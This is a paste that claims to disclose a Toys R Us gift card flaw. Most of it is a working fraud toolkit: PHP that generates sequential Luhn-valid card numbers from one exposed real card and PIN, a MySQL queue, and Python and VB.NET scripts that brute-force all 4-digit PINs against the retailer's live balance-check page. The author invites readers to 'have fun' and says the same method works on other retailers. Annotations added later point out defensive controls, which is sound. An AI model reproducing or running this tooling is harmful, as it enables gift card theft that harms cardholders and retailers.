Toys R Us Gift Card Security Breach 2016 [V2]

  1. Well my 1337 hacker community hackforums.net wouldn't let me post this :'(.
  2.  
  3. Posting this because Toys R Us needs to fix their security. I can't contact them directly, so I'll let you guys handle that.
  4.  
  5. Security on the Internet needs to be taken seriously now-a-days. I'd recommend corporations having a system for these kind of things like Google and Facebook have. But first start off with a captcha. I'm not talking about the text captcha Stables and Home Depot. I'm talking about those nice captchas that this site has for example. Although, that doesn't even work as there are services out there that offer a captcha by-pass and when you're paying $2 for 1000 completed captchas, well hitting a $100 gift card does make up for that.
  6.  
  7. Same method applies to Victoria Secret and Nordstrom too ;).
  8.  
  9. ----------------------------------------------------------------------------------------------
  10.  
  11. Toys R Us gift card numbers follow the Luhn algorithm.
  12.  
  13. Gift Card #: 6276687308393584
  14. Pin #: 0236
  15.  
  16. If you check the gift card # with a Luhn validator: validcreditcardnumber.com
  17.  
  18. It comes back with a green check.
  19.  
  20. Now. We delete one number "4" (627668730839358). Check with: planetcalc.com/2464/
  21.  
  22. They say the next digit is "4". Now we can print out some numbers.
  23.  
  24. <?php
  25.  
  26.  
/**
 * Append Luhn check digits to a digit string.
 *
 * On each of the $iterations passes the string is reversed, every digit at an
 * even (0-based) position of the reversed string is doubled and digit-summed,
 * the total is reduced mod 10, and the digit that brings the total to a
 * multiple of 10 is appended. Each pass therefore extends $number by one digit.
 *
 * Security note: Luhn is an error-detection checksum, not a secret. Anyone can
 * produce numbers that pass it, so a passing checksum says nothing about whether
 * an account exists or who holds it. An issuer whose only barrier is a
 * Luhn-valid number plus a short PIN is exposed to exactly the enumeration this
 * paste describes; unpredictable account numbers and per-card attempt limits
 * are the controls that matter.
 *
 * @param string $number     digit string to extend (the payload)
 * @param int    $iterations number of check digits to append
 * @return string the extended digit string
 */
function Luhn($number, $iterations)
{
    while ($iterations-- >= 1)
    {
        $stack = 0;
        // Reverse so index 0 is the rightmost payload digit, the one Luhn
        // doubles when a check digit is appended after it.
        $number = str_split(strrev($number), 1);

        foreach ($number as $key => $value)
        {
            if ($key % 2 == 0)
            {
                // Double, then sum the digits (e.g. 7 -> 14 -> 1 + 4 = 5).
                $value = array_sum(str_split($value * 2, 1));
            }

            $stack += $value;
        }

        $stack %= 10;

        if ($stack != 0)
        {
            // Negative distance to the next multiple of 10; abs() below turns it into the check digit.
            $stack -= 10;
        }

        $number = implode('', array_reverse($number)) . abs($stack);
    }

    return $number;
}
  56.  
// Fixed 12-digit prefix plus a descending 3-digit suffix; each loop pass emits one
// Luhn-completed 16-digit number as a row of the INSERT printed below.
$orgin = "627668730839";
$last = "358";
?>
INSERT INTO `cards` (`card_number`, `pin_number`, `success`, `proccessing`, `current_pin`, `balance`) VALUES
<?php
// 41 rows (x = 0..40). Defender note: sequentially issued card numbers mean that one
// known card exposes its neighbours; randomly assigned account numbers remove that.
for ($x = 0; $x <= 40; $x++) {

    echo "('" . Luhn($orgin . $last, 1) . "', '0', 0, 0, '0', '')," . "</br>";
    $last -= 1;
}

?>
  69.  
  70. Now we have numbers and a database.
  71.  
-- Work queue for the checker scripts: one row per candidate card number.
-- proccessing (sic) is set to 1 while a worker holds the card and back to 0 when it
-- releases it; success becomes 1 once a PIN is accepted; current_pin keeps the last
-- PIN tried so an interrupted run can resume from it.
-- `id` is declared without PRIMARY KEY or AUTO_INCREMENT, so it is a plain NOT NULL column.
CREATE TABLE `cards` (
  `id` int(11) NOT NULL,
  `card_number` varchar(255) NOT NULL,
  `pin_number` varchar(11) NOT NULL,
  `success` int(11) NOT NULL,
  `proccessing` int(11) NOT NULL,
  `current_pin` varchar(11) NOT NULL,
  `balance` varchar(255) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
  81.  
  82. And now we have a Python script that pulls from the DB and begins checking.
  83.  
  84. from bs4 import BeautifulSoup
  85. import re
  86. import urllib.request, urllib, json, time, atexit, sys
  87. import http
  88. import io
  89. import csv
  90. import os
  91. from random import randint
  92.  
def process_card(card: str, pin: str):
    """Submit one card/PIN pair to the balance-check form and classify the reply.

    Returns the string ``"fail"`` when the page reports a processing error (the
    path ``main()`` treats as a wrong PIN), or the list of
    ``(currency_symbol, amount)`` tuples found by the regex when the page reports
    a balance. On any other page content an ``error_<epoch>.html`` file is
    written and ``exit_handler()`` is called, which terminates the process.

    Defender's view of this traffic: every call builds a fresh cookie jar, so
    each PIN attempt is a brand-new session that first GETs the form page and
    then POSTs the same ``accountNumber`` with a different ``pin``. Many new
    sessions per minute from one source, all against one account number, is the
    signal a per-card lockout or per-source rate limit would catch.
    """
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", 'Referer': 'https://www.toysrus.com/checkout/checkAccountBalance.jsp', "Content-Type":'application/x-www-form-urlencoded'}

    # A new, empty cookie jar per call: no session state survives between attempts.
    cj = http.cookiejar.CookieJar()
    req = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    req.addheaders = list(headers.items())

    # The form page is loaded first, presumably so cookies it sets accompany the POST.
    req.open("https://www.toysrus.com/checkout/checkAccountBalance.jsp")

    # The data should be URL-encoded and then encoded using UTF-8 for best compatibility
    data = urllib.parse.urlencode({"step": "giftcardBalance", "accountNumber": str(card), "pin": str(pin)}).encode("UTF-8")
    res = req.open("https://www.toysrus.com/coreg/index.jsp", data)

    # Only the <div class="instructions"> elements are inspected; they carry the result text.
    parse_page = BeautifulSoup(res.read(), "lxml")
    grab_result = str(parse_page.findAll("div", { "class" : "instructions" }))

    if "Error processing, please try again later" in grab_result:
        amount = "fail"
    elif "This reflects your" in grab_result:
        # Captures (symbol, amount) pairs such as ("$", "25.00").
        amount = re.findall(r'([£$€])(\d+(?:\.\d{2})?)', grab_result)
    else:
        # Unrecognised page: keep a copy for inspection, then stop via exit_handler().
        print("Error Handle Alert")
        f = open("error_" + str(int(time.time())) + ".html", "wb")
        content = res.read()
        f.write(content)
        f.close()
        exit_handler()

    return amount
  122.  
# Module-level state: main() assigns both through ``global``; exit_handler() reads card_number.
card_number = None
pin_number = None
  125.  
def main() -> None:
    """Fetch one queued card from the local organizer and sweep PINs against it.

    Flow as written: GET ``organizer.php?grab=yea`` for a ``card`` or
    ``card|pin`` line, mark the card as being processed, then call
    ``process_card`` for successive 4-digit PINs starting at the stored resume
    point. The first non-"fail" reply is reported back with the balance and the
    process exits; every failed PIN is also reported so the organizer can store
    it as the resume point.

    Defender's view: this is an online brute force of a 4-digit secret, which
    has only ten thousand possible values, and each guess is a normal-looking
    form submission. The server cannot tell one guess from a legitimate
    customer, so the controls have to be aggregate ones: lock the card after a
    small number of wrong PINs, throttle per source, and alert on many distinct
    PINs for one account number.
    """
    global card_number
    global pin_number

    # The organizer answers with raw bytes: either "card" or "card|current_pin".
    card_number = urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?grab=yea")).read()

    if "|" in str(card_number):
        card_number_split = str(card_number.strip().decode("utf-8")).split("|")
        card_number = str(card_number_split[0])
        pin_number = str(card_number_split[1])
    else:
        card_number = str(card_number.strip().decode("utf-8"))

    if card_number is "":
        exit_handler()

    # Claim the card (the organizer sets proccessing=1) so other workers skip it.
    request_processing = urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" + card_number)).read()

    if request_processing is None:
        exit_handler()
    else:
        print("[STARTING]")
        # Resume from the PIN the organizer recorded, else from 0000.
        if pin_number is None:
            range_set = 0
        else:
            range_set = int(pin_number)

        for i in range(range_set, 9999):
            pin = '{0:04}'.format(i)
            process = process_card(card_number, pin)

            # process is either the string "fail" or a list of (symbol, amount) tuples.
            if "fail" not in process:
                urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&success=yea&card=" + card_number + "&pin=" + pin + "&balance=" + process[0][1]))
                print("Success:", process[0][1])
                exit()
            else:
                print("Failed:", card_number, pin)
                # Stores this PIN as current_pin so an interrupted run resumes here.
                urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" + card_number + "&pin=" + pin))
  164.  
def exit_handler():
    """Release the current card back to the queue, then terminate the process.

    The organizer request with ``proccessing=na`` clears the card's in-progress
    flag so another run can pick it up. ``sys.exit(0)`` raises ``SystemExit``,
    which is caught immediately, and ``os._exit(0)`` then ends the interpreter
    without running further cleanup (including ``atexit`` hooks), so this
    function never returns to its caller.
    """
    global card_number
    urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=na&card=" + card_number))
    try:
        sys.exit(0)
    except SystemExit:
        os._exit(0)
  172.  
if __name__=='__main__':
    # Both an interrupt and any ordinary exception go through exit_handler(), which
    # un-claims the card and terminates. SystemExit raised by exit() inside main() is
    # not an Exception subclass, so it propagates untouched.
    try:
        main()
    except KeyboardInterrupt:
        exit_handler()
    except Exception as e:
        exit_handler()

# NOTE(review): the paste lost its indentation, so whether this line sits inside the
# guard above cannot be recovered; it is shown at module level here.
atexit.register(exit_handler)
  182.  
  183. All of a sudden we have the other PHP file.
  184.  
<?php
// organizer.php
//
// Local HTTP front-end to the `cards` work queue used by the checker scripts.
// Query-string protocol as implemented below:
//   grab=yea                                         -> print one unclaimed card as "card" or "card|current_pin"
//   update=yea&proccessing=yea&card=...              -> claim: proccessing=1; with &pin=... also store current_pin
//   update=yea&success=yea&card=...&pin=...&balance= -> store the accepted PIN and balance, success=1
//   update=yea&proccessing=na&card=...               -> release: proccessing=0
//
// Review notes (code left exactly as posted):
//  * isset() returns a bool, and under PHP's loose comparison `true == "yea"` is true,
//    so every `isset($x) == "yea"` test only checks that the parameter is present.
//  * The branches are independent ifs, so one request can satisfy several of them;
//    they run top to bottom and the last matching UPDATE wins.
//  * Every statement is built by concatenating raw $_GET values into SQL with no
//    escaping or prepared statements, and the endpoint has no authentication: anyone
//    who can reach it can read or rewrite the whole table.
//  * A new database connection is opened and closed in each branch.

$servername = "localhost";
$username = "DB USERNSME";
$password = "DB PASSWORD";
$dbname = "DB NAME";

// Absent parameters yield null here (with an undefined-index notice/warning).
$grab = $_GET['grab'];
$update = $_GET['update'];
$pin = $_GET['pin'];
$card = $_GET['card'];
$success = $_GET['success'];
$proccessing = $_GET['proccessing'];
$balance = $_GET['balance'];

// --- grab: hand out one card that is neither claimed nor already cracked ---
if(isset($grab) == "yea") {
    // Create connection
    $conn = new mysqli($servername, $username, $password, $dbname);
    // Check connection
    if ($conn->connect_error) {
        die("Connection failed: " . $conn->connect_error);
    }

    // Whole table fetched in random order, presumably to spread concurrent workers.
    $sql = "SELECT * FROM cards ORDER BY RAND()";
    $result = $conn->query($sql);

    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            if($row['proccessing'] == 0 && $row['success'] == 0) {
                // current_pin is initialised to '0' by the generator; anything else is a resume point.
                if($row['current_pin'] == 0) {
                    echo $row['card_number'];
                    break;
                } else {
                    echo $row['card_number'] . "|" . $row['current_pin'];
                    break;
                }
            }
        }
    } else {
        echo "Fail";
    }
    $conn->close();
}

// --- success: record the accepted PIN and the balance text ---
if(isset($update) == "yea" && isset($success) == "yea" && isset($card) && isset($pin) && isset($balance)) {
    // Create connection
    $conn = new mysqli($servername, $username, $password, $dbname);
    // Check connection
    if ($conn->connect_error) {
        die("Connection failed: " . $conn->connect_error);
    }

    // $pin, $balance and $card come straight from the query string (SQL injection).
    $sql = "UPDATE cards SET pin_number='" . $pin . "', balance='" . $balance . "', success='1' WHERE card_number='" . $card . "';";
    $result = $conn->query($sql);

    if (!$result) {
        echo "Fail";
    }
    $conn->close();
}

// --- claim: also matched by every success/progress request and by proccessing=na ---
if(isset($update) == "yea" && isset($proccessing) == "yea" && isset($card)) {
    // Create connection
    $conn = new mysqli($servername, $username, $password, $dbname);
    // Check connection
    if ($conn->connect_error) {
        die("Connection failed: " . $conn->connect_error);
    }

    $sql = "UPDATE cards SET proccessing='1' WHERE card_number='" . $card . "';";
    $result = $conn->query($sql);

    if (!$result) {
        echo "Fail";
    }
    $conn->close();
}

// --- release: runs after the claim branch above, so for proccessing=na the final value is 0 ---
if(isset($update) == "yea" && isset($proccessing) && $proccessing == "na" && isset($card)) {
    // Create connection
    $conn = new mysqli($servername, $username, $password, $dbname);
    // Check connection
    if ($conn->connect_error) {
        die("Connection failed: " . $conn->connect_error);
    }

    $sql = "UPDATE cards SET proccessing='0' WHERE card_number='" . $card . "';";
    $result = $conn->query($sql);

    if (!$result) {
        echo "Fail";
    }
    $conn->close();
}

// --- progress: store the last PIN tried as the resume point ---
if(isset($update) == "yea" && isset($proccessing) == "yea" && isset($card) && isset($pin)) {
    // Create connection
    $conn = new mysqli($servername, $username, $password, $dbname);
    // Check connection
    if ($conn->connect_error) {
        die("Connection failed: " . $conn->connect_error);
    }

    $sql = "UPDATE cards SET current_pin='" . $pin . "' WHERE card_number='" . $card . "';";
    $result = $conn->query($sql);

    if (!$result) {
        echo "Fail";
    }
    $conn->close();
}
?>
  298.  
  299. You can figure out how to piece it together. But once up n' running, have fun.
  300.  
  301. VB.NET version:
  302.  
  303. Imports System.IO
  304. Imports System.Net
  305.  
' WinForms port of the Python checker. A WebBrowser control (embedded IE) loads the real
' balance-check page and the code fills the form fields and clicks the button, so every
' attempt is a genuine browser-rendered submission; coordination goes through the same
' local organizer.php endpoint.
' Defender's view: per request this is indistinguishable from a customer checking a
' balance. The workable controls are aggregate ones - a per-card wrong-PIN lockout,
' per-source throttling, and alerting on many distinct PINs for one account number.
Public Class Form1
    ' Assigned in several handlers but never read in this listing.
    Dim Begin As Boolean = False
    ' Card and resume PIN handed out by organizer.php in Form1_Load; the card is released
    ' again in Form1_FormClosing.
    Dim pin As String
    Dim card As String
    ' Remove every character Windows forbids in file names; used to clean the balance text.
    Private Function RemoveInvalidFileNameChars(UserInput As String) As String
        For Each invalidChar In IO.Path.GetInvalidFileNameChars
            UserInput = UserInput.Replace(invalidChar, "")
        Next
        Return UserInput
    End Function
    ' Return the trimmed text between the first sStart (searching from 1-based position lSearch)
    ' and the following sStop, or vbNullString when either marker is not found.
    Private Function GetBetween(ByVal sSearch As String, ByVal sStart As String, ByVal sStop As String, Optional ByVal lSearch As Integer = 1) As String
        Dim lTemp As Long

        lSearch = InStr(lSearch, sSearch, sStart)
        If lSearch > 0 Then
            lSearch = lSearch + Len(sStart)
            lTemp = InStr(lSearch, sSearch, sStop)
            If lTemp > lSearch Then Return Trim(Mid$(sSearch, lSearch, lTemp - lSearch))
        End If
        Return vbNullString
    End Function
    ' Manual start: take the PIN typed in TextBox1 as the counter value and load the page.
    Private Sub Button2_Click(sender As Object, e As EventArgs)

        NumericUpDown2.Value = TextBox1.Text
        WebBrowser1.Navigate("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
        Begin = True
    End Sub
    ' Runs on every DocumentCompleted. Classifies the loaded page, reports to the organizer,
    ' and then either advances the PIN counter (error text), closes the form (balance text),
    ' starts Timer1 (no PIN field on the page), or fills in and submits the form.
    ' Declared As String but never assigns a return value, so callers receive Nothing.
    Public Function Proccess() As String
        Begin = False

        If WebBrowser1.DocumentText.Contains("Error processing") Then
            ' Wrong PIN: store progress, then bump the counter; its ValueChanged handler rewrites TextBox1.
            Dim webClient As New System.Net.WebClient
            webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" & TextBox3.Text & "&pin=" & TextBox1.Text)
            NumericUpDown2.Value += 1
        ElseIf WebBrowser1.DocumentText.Contains("This reflects your Toys R Us Gift Card Balance") Then
            Dim webClient As New System.Net.WebClient

            ' Text of the first <div class="instructions">, cleaned and split on "$";
            ' balance_(1) is whatever follows the first "$".
            Dim balance As String = GetBetween(WebBrowser1.DocumentText, "<div class=""instructions"">", "</div>")
            Dim balance_ As String() = RemoveInvalidFileNameChars(balance).Split("$")
            webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&success=yea&card=" & TextBox3.Text & "&pin=" & TextBox1.Text & "&balance=" & balance_(1))
            'MessageBox.Show("Success! PIN: " & TextBox1.Text)

            'WebBrowser1.Navigate("javascript:document.newcard.submit()")

            ' Closing the form fires Form1_FormClosing, which releases the card.
            Me.Close()

        ElseIf WebBrowser1.Document.GetElementById("pin") Is Nothing Then
            ' No form on the page: let Timer1 fill the progress bar and reload.
            Timer1.Enabled = True
            Timer1.Start()
        End If
        If Not WebBrowser1.Document.GetElementById("accountNumber") Is Nothing Then
            ' Form present: fill both fields and click the check button.
            WebBrowser1.Document.GetElementById("accountNumber").SetAttribute("value", TextBox3.Text)
            WebBrowser1.Document.GetElementById("pin").SetAttribute("value", TextBox1.Text.ToString)
            WebBrowser1.Document.GetElementById("checkAccountBtn").Focus()
            WebBrowser1.Document.GetElementById("checkAccountBtn").InvokeMember("click")
        End If
    End Function
    ' Every page load (initial, retry, or the result page after a click) goes through Proccess().
    Private Sub WebBrowser1_DocumentCompleted(sender As Object, e As WebBrowserDocumentCompletedEventArgs) Handles WebBrowser1.DocumentCompleted
        Proccess()
    End Sub
    ' Mirror the counter into TextBox1 as a zero-padded 4-digit string.
    Private Sub NumericUpDown2_ValueChanged(sender As Object, e As EventArgs) Handles NumericUpDown2.ValueChanged
        If NumericUpDown2.Value < 10 Then
            TextBox1.Text = "000" & NumericUpDown2.Value
        ElseIf NumericUpDown2.Value < 100 Then
            TextBox1.Text = "00" & NumericUpDown2.Value
        ElseIf NumericUpDown2.Value < 1000 Then
            TextBox1.Text = "0" & NumericUpDown2.Value
        ' NOTE(review): same condition as the branch above, so this branch is unreachable.
        ElseIf NumericUpDown2.Value < 1000 Then
            TextBox1.Text = NumericUpDown2.Value
        Else
            TextBox1.Text = NumericUpDown2.Value
        End If
    End Sub

    ' Release the card (proccessing=0) whenever the form closes, for whatever reason.
    Private Sub Form1_FormClosing(sender As Object, e As FormClosingEventArgs) Handles Me.FormClosing
        Dim webClient As New System.Net.WebClient
        webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=na&card=" & card)
    End Sub

    ' Retry timer. Closes the form when TextBox1 equals TextBox2 (presumably an end-of-range
    ' PIN; TextBox2 is not assigned anywhere in this listing). Otherwise fills the progress
    ' bar one step per tick and, once full, reloads the page and stops itself.
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        If TextBox1.Text = TextBox2.Text Then
            Me.Close()
        End If
        ProgressBar1.Value += 1
        If ProgressBar1.Value = ProgressBar1.Maximum Then
            WebBrowser1.Navigate("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
            Timer1.Enabled = False
            Timer1.Stop()
            ProgressBar1.Value = 0
        End If
    End Sub

    ' The structure we use for the information
    ' to be interpreted correctly by API.
    Public Structure Struct_INTERNET_PROXY_INFO
        Public dwAccessType As Integer
        Public proxy As IntPtr
        Public proxyBypass As IntPtr
    End Structure

    ' The Windows API function that allows us to manipulate
    ' IE settings programmatically.
    Private Declare Auto Function InternetSetOption Lib "wininet.dll" _
    (ByVal hInternet As IntPtr, ByVal dwOption As Integer, ByVal lpBuffer As IntPtr,
    ByVal lpdwBufferLength As Integer) As Boolean

    ' The function we will be using to set the proxy settings.
    ' Sets a process-wide WinINet proxy (the embedded IE control is expected to pick it up).
    ' Not called anywhere in this listing. The two StringToHGlobalAnsi buffers and the
    ' AllocCoTaskMem block are never freed, and the InternetSetOption result is not checked.
    Private Sub RefreshIESettings(ByVal strProxy As String)
        Const INTERNET_OPTION_PROXY As Integer = 38
        Const INTERNET_OPEN_TYPE_PROXY As Integer = 3
        Dim struct_IPI As Struct_INTERNET_PROXY_INFO

        ' Filling in structure
        struct_IPI.dwAccessType = INTERNET_OPEN_TYPE_PROXY
        struct_IPI.proxy = System.Runtime.InteropServices.Marshal.StringToHGlobalAnsi(strProxy)
        struct_IPI.proxyBypass = System.Runtime.InteropServices.Marshal.StringToHGlobalAnsi("local")

        ' Allocating memory
        Dim intptrStruct As IntPtr = System.Runtime.InteropServices.Marshal.AllocCoTaskMem(System.Runtime.InteropServices.Marshal.SizeOf(struct_IPI))

        ' Converting structure to IntPtr
        System.Runtime.InteropServices.Marshal.StructureToPtr(struct_IPI, intptrStruct, True)
        Dim iReturn As Boolean = InternetSetOption(IntPtr.Zero, INTERNET_OPTION_PROXY, intptrStruct, System.Runtime.InteropServices.Marshal.SizeOf(struct_IPI))
    End Sub

    ' Startup: ask the organizer for a card (optionally "card|pin" with a resume PIN),
    ' claim it (proccessing=1), and load the balance-check page.
    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles Me.Load
        Dim webClient As New System.Net.WebClient
        Dim result As String = webClient.DownloadString("http://127.0.0.1/gift/organizer.php?grab=yea")
        If result.Contains("|") Then
            Dim split As String() = result.Split("|")
            card = split(0)
            pin = split(1)
            NumericUpDown2.Value = pin
            TextBox1.Text = pin
            TextBox3.Text = card
        Else
            card = result
            TextBox3.Text = result
            NumericUpDown2.Value = TextBox1.Text
        End If

        webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" & card)
        WebBrowser1.Navigate("https://www.toysrus.com/checkout/checkAccountBalance.jsp")

        Begin = True
    End Sub
End Class